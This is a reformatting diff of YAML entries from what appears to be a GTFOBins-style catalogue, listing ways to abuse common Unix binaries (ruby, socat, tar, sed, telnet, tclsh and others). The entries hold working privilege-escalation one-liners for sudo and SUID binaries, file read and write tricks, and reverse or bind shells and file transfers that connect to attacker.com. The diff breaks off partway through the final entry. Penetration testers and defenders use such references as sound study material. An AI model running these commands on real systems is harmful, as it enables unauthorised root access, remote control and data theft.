||||
load-library:
|
||||
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||
suid-enabled:
|
||||
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
||||
sudo-enabled:
|
||||
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
||||
---
|
||||
|
@ -1,14 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: rlwrap /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo rlwrap /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./rlwrap -H /dev/null /bin/sh -p
|
||||
- code: rlwrap /bin/sh
|
||||
file-write:
|
||||
- description: This adds timestamps to the output file. This relies on the external `echo` command.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
rlwrap -l "$LFILE" echo data
|
||||
- description: This adds timestamps to the output file. This relies on the external
|
||||
`echo` command.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
rlwrap -l "$LFILE" echo data
|
||||
suid-enabled:
|
||||
- code: "./rlwrap -H /dev/null /bin/sh -p"
|
||||
sudo-enabled:
|
||||
- code: sudo rlwrap /bin/sh
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
---
|
||||
|
@ -1,32 +1,33 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: ruby -e 'exec "/bin/sh"'
|
||||
sudo-enabled:
|
||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
ruby -run -e httpd . -p $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export RFILE=/file_to_get
|
||||
export LFILE=file_to_save
|
||||
ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
|
||||
- code: ruby -e 'exec "/bin/sh"'
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
file-read:
|
||||
- code: ruby -e 'puts File.read("file_to_read")'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server. This requires
|
||||
version 1.9.2 or later.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
ruby -run -e httpd . -p $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export RFILE=/file_to_get
|
||||
export LFILE=file_to_save
|
||||
ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
|
||||
file-write:
|
||||
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
|
||||
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
|
||||
file-read:
|
||||
- code: ruby -e 'puts File.read("file_to_read")'
|
||||
load-library:
|
||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||
sudo-enabled:
|
||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||
---
|
||||
|
@ -1,36 +1,36 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="id"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
scp -S $TF x y:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="id"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
sudo scp -S $TF x y:
|
||||
suid-limited:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="id"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
./scp -S $TF a b:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="id"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
scp -S $TF x y:
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RPATH=user@attacker.com:~/file_to_save
|
||||
LPATH=file_to_send
|
||||
scp $LFILE $RPATH
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RPATH=user@attacker.com:~/file_to_save
|
||||
LPATH=file_to_send
|
||||
scp $LFILE $RPATH
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RPATH=user@attacker.com:~/file_to_get
|
||||
LFILE=file_to_save
|
||||
scp $RPATH $LFILE
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RPATH=user@attacker.com:~/file_to_get
|
||||
LFILE=file_to_save
|
||||
scp $RPATH $LFILE
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="id"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
sudo scp -S $TF x y:
|
||||
suid-limited:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="id"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
./scp -S $TF a b:
|
||||
---
|
||||
|
@ -1,24 +1,24 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- description: GNU version only. Also, this requires `bash`.
|
||||
code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
|
||||
- description: GNU version only. Also, this requires `bash`.
|
||||
code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
|
||||
execute-non-interactive:
|
||||
- description: GNU version only.
|
||||
code: sed -n "1e id" /etc/hosts
|
||||
sudo-enabled:
|
||||
- description: GNU version only. Also, this requires `bash`.
|
||||
code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./sed -e '' "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sed '' "$LFILE"
|
||||
- description: GNU version only.
|
||||
code: sed -n "1e id" /etc/hosts
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sed -n "1s/.*/data/w $LFILE" /etc/hosts
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sed -n "1s/.*/data/w $LFILE" /etc/hosts
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sed '' "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./sed -e '' "$LFILE"
|
||||
sudo-enabled:
|
||||
- description: GNU version only. Also, this requires `bash`.
|
||||
code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: setarch $(arch) /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo setarch $(arch) /bin/sh
|
||||
- code: setarch $(arch) /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./setarch $(arch) /bin/sh -p
|
||||
- code: "./setarch $(arch) /bin/sh -p"
|
||||
sudo-enabled:
|
||||
- code: sudo setarch $(arch) /bin/sh
|
||||
---
|
||||
|
@ -1,25 +1,25 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
HOST=user@attacker.com
|
||||
sftp $HOST
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
HOST=user@attacker.com
|
||||
sudo sftp $HOST
|
||||
!/bin/sh
|
||||
- code: |
|
||||
HOST=user@attacker.com
|
||||
sftp $HOST
|
||||
!/bin/sh
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RHOST=user@attacker.com
|
||||
sftp $RHOST
|
||||
put file_to_send file_to_save
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RHOST=user@attacker.com
|
||||
sftp $RHOST
|
||||
put file_to_send file_to_save
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RHOST=user@attacker.com
|
||||
sftp $RHOST
|
||||
get file_to_get file_to_save
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RHOST=user@attacker.com
|
||||
sftp $RHOST
|
||||
get file_to_get file_to_save
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
HOST=user@attacker.com
|
||||
sudo sftp $HOST
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,17 +1,17 @@
|
||||
---
|
||||
description: The read file content is corrupted by adding a newline.
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sudo shuf -e data -o "$LFILE"
|
||||
suid-enabled:
|
||||
- description:
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
./shuf -e data -o "$LFILE"
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
shuf -e data -o "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
shuf -e data -o "$LFILE"
|
||||
suid-enabled:
|
||||
- description:
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
./shuf -e data -o "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sudo shuf -e data -o "$LFILE"
|
||||
---
|
||||
|
@ -1,14 +1,16 @@
|
||||
---
|
||||
functions:
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
|
||||
the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
||||
bind-shell-interactive:
|
||||
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
|
||||
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code>
|
||||
on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo sort -m "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./sort -m "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sort -m "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sort -m "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./sort -m "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo sort -m "$LFILE"
|
||||
---
|
||||
|
@ -1,21 +1,21 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: sqlite3 /dev/null '.shell /bin/sh'
|
||||
sudo-enabled:
|
||||
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
|
||||
suid-limited:
|
||||
- code: ./sqlite3 /dev/null '.shell /bin/sh'
|
||||
- code: sqlite3 /dev/null '.shell /bin/sh'
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sqlite3 << EOF
|
||||
CREATE TABLE t(line TEXT);
|
||||
.import $LFILE t
|
||||
SELECT * FROM t;
|
||||
EOF
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sqlite3 << EOF
|
||||
CREATE TABLE t(line TEXT);
|
||||
.import $LFILE t
|
||||
SELECT * FROM t;
|
||||
EOF
|
||||
sudo-enabled:
|
||||
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
|
||||
suid-limited:
|
||||
- code: "./sqlite3 /dev/null '.shell /bin/sh'"
|
||||
---
|
||||
|
@ -1,30 +1,32 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- description: Reconnecting may help bypassing restricted shells.
|
||||
code: ssh localhost $SHELL --noprofile --norc
|
||||
- description: Spawn interactive shell through ProxyCommand option.
|
||||
code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
|
||||
sudo-enabled:
|
||||
- description: Spawn interactive root shell through ProxyCommand option.
|
||||
code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
HOST=user@attacker.com
|
||||
RPATH=file_to_get
|
||||
LPATH=file_to_save
|
||||
ssh $HOST "cat $RPATH" > $LPATH
|
||||
- description: Reconnecting may help bypassing restricted shells.
|
||||
code: ssh localhost $SHELL --noprofile --norc
|
||||
- description: Spawn interactive shell through ProxyCommand option.
|
||||
code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'"
|
||||
x
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
HOST=user@attacker.com
|
||||
RPATH=file_to_save
|
||||
LPATH=file_to_send
|
||||
ssh $HOST "cat > $RPATH" < $LPATH
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
HOST=user@attacker.com
|
||||
RPATH=file_to_save
|
||||
LPATH=file_to_send
|
||||
ssh $HOST "cat > $RPATH" < $LPATH
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
HOST=user@attacker.com
|
||||
RPATH=file_to_get
|
||||
LPATH=file_to_save
|
||||
ssh $HOST "cat $RPATH" > $LPATH
|
||||
file-read:
|
||||
- description: The read file content is corrupted by error prints.
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
ssh -F $LFILE localhost
|
||||
- description: The read file content is corrupted by error prints.
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
ssh -F $LFILE localhost
|
||||
sudo-enabled:
|
||||
- description: Spawn interactive root shell through ProxyCommand option.
|
||||
code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh
|
||||
-i'" x
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: stdbuf -i0 /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo stdbuf -i0 /bin/sh
|
||||
- code: stdbuf -i0 /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./stdbuf -i0 /bin/sh -p
|
||||
- code: "./stdbuf -i0 /bin/sh -p"
|
||||
sudo-enabled:
|
||||
- code: sudo stdbuf -i0 /bin/sh
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: strace -o /dev/null /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo strace -o /dev/null /bin/sh
|
||||
- code: strace -o /dev/null /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./strace -o /dev/null /bin/sh -p
|
||||
- code: "./strace -o /dev/null /bin/sh -p"
|
||||
sudo-enabled:
|
||||
- code: sudo strace -o /dev/null /bin/sh
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo tail -c1G "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./tail -c1G "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
tail -c1G "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
tail -c1G "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./tail -c1G "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo tail -c1G "$LFILE"
|
||||
---
|
||||
|
@ -1,24 +1,24 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
execute-non-interactive:
|
||||
- description: This only works for GNU tar.
|
||||
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
|
||||
sudo-enabled:
|
||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
suid-limited:
|
||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
- description: This only works for GNU tar.
|
||||
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
|
||||
file-write:
|
||||
- description: This only works for GNU tar.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
TF=$(mktemp)
|
||||
echo data > "$TF"
|
||||
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
|
||||
- description: This only works for GNU tar.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
TF=$(mktemp)
|
||||
echo data > "$TF"
|
||||
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
|
||||
file-read:
|
||||
- description: This only works for GNU tar.
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
|
||||
- description: This only works for GNU tar.
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
|
||||
sudo-enabled:
|
||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
suid-limited:
|
||||
- code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: taskset 1 /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo taskset 1 /bin/sh
|
||||
- code: taskset 1 /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./taskset 1 /bin/sh -p
|
||||
- code: "./taskset 1 /bin/sh -p"
|
||||
sudo-enabled:
|
||||
- code: sudo taskset 1 /bin/sh
|
||||
---
|
||||
|
@ -1,21 +1,21 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
suid-enabled:
|
||||
- code: |
|
||||
./tclsh
|
||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||
- code: |
|
||||
tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
reverse-shell-non-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
|
||||
suid-enabled:
|
||||
- code: |
|
||||
./tclsh
|
||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
---
|
||||
|
@ -1,17 +1,18 @@
|
||||
---
|
||||
description: |
|
||||
It can only append data if the destination exists.
|
||||
description: 'It can only append data if the destination exists.
|
||||
|
||||
'
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | sudo tee -a "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | ./tee -a "$LFILE"
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | ./tee -a "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | ./tee -a "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | ./tee -a "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | sudo tee -a "$LFILE"
|
||||
---
|
||||
|
@ -1,36 +1,35 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
TF=$(mktemp)
|
||||
rm $TF
|
||||
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
TF=$(mktemp)
|
||||
rm $TF
|
||||
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
|
||||
sudo-enabled:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
sudo telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
sudo telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
./telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
./telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send local file to a TFTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
tftp $RHOST
|
||||
put file_to_send
|
||||
- description: Send local file to a TFTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
tftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
- description: Fetch a remote file from a TFTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
tftp $RHOST
|
||||
get file_to_get
|
||||
- description: Fetch a remote file from a TFTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
tftp $RHOST
|
||||
get file_to_get
|
||||
---
|
||||
|
@ -4,9 +4,9 @@ description: |
|
||||
behave differently than` /usr/bin/time`, hence the absolute path.
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: /usr/bin/time /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo /usr/bin/time /bin/sh
|
||||
- code: "/usr/bin/time /bin/sh"
|
||||
suid-enabled:
|
||||
- code: ./time /bin/sh -p
|
||||
- code: "./time /bin/sh -p"
|
||||
sudo-enabled:
|
||||
- code: sudo /usr/bin/time /bin/sh
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: timeout 7d /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo timeout --foreground 7d /bin/sh
|
||||
- code: timeout 7d /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./timeout 7d /bin/sh -p
|
||||
- code: "./timeout 7d /bin/sh -p"
|
||||
sudo-enabled:
|
||||
- code: sudo timeout --foreground 7d /bin/sh
|
||||
---
|
||||
|
@ -3,16 +3,16 @@ description: |
|
||||
The read file content is corrupted by replacing occurrences of `$'\b_'` to
|
||||
terminal sequences and by converting tabs to spaces.
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo ul "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./ul "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
ul "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
ul "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./ul "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo ul "$LFILE"
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo unexpand -t99999999 "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./unexpand -t99999999 "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
unexpand -t99999999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
unexpand -t99999999 "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./unexpand -t99999999 "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
